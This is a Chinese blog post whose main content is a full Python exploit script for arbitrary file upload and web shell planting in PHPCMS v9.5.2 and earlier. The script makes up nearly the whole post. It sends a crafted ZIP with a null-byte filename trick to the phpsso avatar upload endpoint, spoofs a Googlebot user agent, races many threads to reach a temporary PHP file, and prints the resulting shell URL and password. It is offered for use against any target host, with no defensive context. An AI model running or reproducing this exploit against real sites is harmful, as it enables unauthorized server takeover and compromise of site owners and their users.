• 凉风有兴,秋月无边, 亏我思娇的情绪好比度日如年。
  • 虽然我不是玉树临风,潇洒倜傥, 可是我有我广阔的胸襟,加强健的臂腕!

PHPCMS最新Getshell代码Exp,通杀<=v9.5.2所有版本

漏洞预警 villain 3个月前 (05-02) 125次浏览 未收录 0个评论
#coding=GB2312
#Date: 2014-01-11 23:50
#Created by felixk3y
#Name: PHPCMS <=V9.5.2 Arbitrary File Upload Exploit...
#Blog: [url]http://weibo.com/rootsafe[/url]

import os
import sys
import socket
import urllib
import urllib2
import threading
import msvcrt

# postu: 文件上传post的URL
# shell: 最终生成shell的URL
# tmpfile: 文件上传生成的临时文件URL
# dvalue: 上传头像的data参数值
# postu & shell & tmpfile & dvalue 这四个参数根据具体情况更改
# 如果用的是默认的<a href="http://www.1004619.com/tag/phpcms/" title="查看更多关于phpcms的文章" target="_blank">phpcms</a>.zip包,则只需要修改tmpfile & dvalue
postu = '/phpsso_server/index.php'
shell = '/phpsso_server/uploadfile/shell.php'
tmpfile = '/phpsso_server/uploadfile/avatar/1/1/1/1.php'
dvalue = '3f84AABWUlIDVAFSUwRTVA9QVwRRUAFXAFcLUFNMWgYKAENAQzkDF0cMbgkGTlsAXQdlJQIJCEVqAE5mMUhUJ28FJHV8ABcgXCN5NS5ZNQ'

class upload(threading.Thread):
def __init__(self,num,loop,host,header,tmpfile,shell):
threading.Thread.__init__(self)
self.num = num
self.loop = loop
self.host = host
self.header = header
self.shell = '%s%s' % (host,shell)
self.tmpfile = '%s%s' % (host,tmpfile)

def run(self):
while True:
print '正在进行第%d轮尝试...\n' % self.loop
while(self.num<3):
print '正在进行第%d次尝试访问临时文件...' % self.num
self._get(self.tmpfile)
self.num += 1
self.num = 1
while(self.num<11):
print '正在进行第%d次提交ZIP数据包同时试访问临时文件...' % self.num
self.send_socket(self.host,self.header)
self._get(self.tmpfile)
self.num += 1
self.num = 1
while(self.num<11):
print '正在进行第%d次尝试访问临时文件...' % self.num
self._get(self.tmpfile)
self.num += 1
self.loop += 1
self.num = 1

def _get(self,tmpfile):
try:
response = urllib2.urlopen(tmpfile)
if response.getcode() == 200:
print '\nSuccess!\nShell: %s\nPass is [1@3].' % self.shell
#os._exit(1)
except urllib2.HTTPError,e:
pass

def send_socket(self,host,headers):
if 'http://' in host:
host = host.split('/')[2]
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host, 80))
sock.send(headers)
sock.close()

class ThreadStop(threading.Thread):
def run(self):
try:
chr = msvcrt.getch()
if chr == 'q':
print "stopped by your action( q )."
os._exit(1)
except:
os._exit(1)

def usage():
print '\n\tUsage: upload-exp.py '
print '\n\tExp: upload-exp.py [url]www.vulns.org[/url] cookie'
os._exit(0)

def hex_to_asc(ch):
ch = int(float.fromhex(ch))
return '{:c}'.format(ch)

def post_data():
postdata = ''
asc = hex_to_asc('00')
repstr = 'php%sphp' % asc
fps = open('<a href="http://www.1004619.com/tag/phpcms/" title="查看更多关于phpcms的文章" target="_blank">phpcms</a>.zip','rb')
for sbin in fps.readlines():
postdata += sbin
postdata = postdata.replace('php.php',repstr)
return postdata

def exploit():
num = 1
loop = 1
threads = []
host = sys.argv[1]
cookie = sys.argv[2]
if 'http://' not in host:
host = 'http://%s' % host

postdata = post_data()
mhost = host.split('/')[2]

params = 'm=phpsso&c=index&a=uploadavatar&auth_data=v=1&appid=1&data=%s' % dvalue
posturl = '%s?%s' % (postu,params)
header = 'POST %s HTTP/1.1\r\n' % posturl
header += 'Host: %s\r\n' % mhost
header += 'User-Agent: Googlebot/2.1 (+[url]http://www.google.com/bot.html[/url])\r\n'
header += 'Content-Type: application/octet-stream\r\n'
header += 'Accept-Encoding: gzip,deflate,sdch\r\n'
header += 'Content-Length: %d\r\n' % len(postdata)
header += 'Cookie: %s\r\n\r\n' % cookie
header += '%s\r\n' % postdata

shouhu = ThreadStop()
shouhu.setDaemon(True)
shouhu.start()

for i in range(20):#线程数不要太小了
t = upload(num,loop,host,header,tmpfile,shell)
t.start()
threads.append(t)
for th in threads:
t.join()

if __name__ == "__main__":
if len(sys.argv) < 2:
usage()
exploit()
PHPCMS最新Getshell代码Exp,通杀<=v9.5.2所有版本

 

PHPCMS最新Getshell代码Exp,通杀<=v9.5.2所有版本

Villain博客 , 版权所有丨如有问题请联系客服QQ:1004619丨
转载请注明PHPCMS最新Getshell代码Exp,通杀<=v9.5.2所有版本
喜欢 (0)
[gqakcom@126.com]
分享 (0)

您必须 登录 才能发表评论!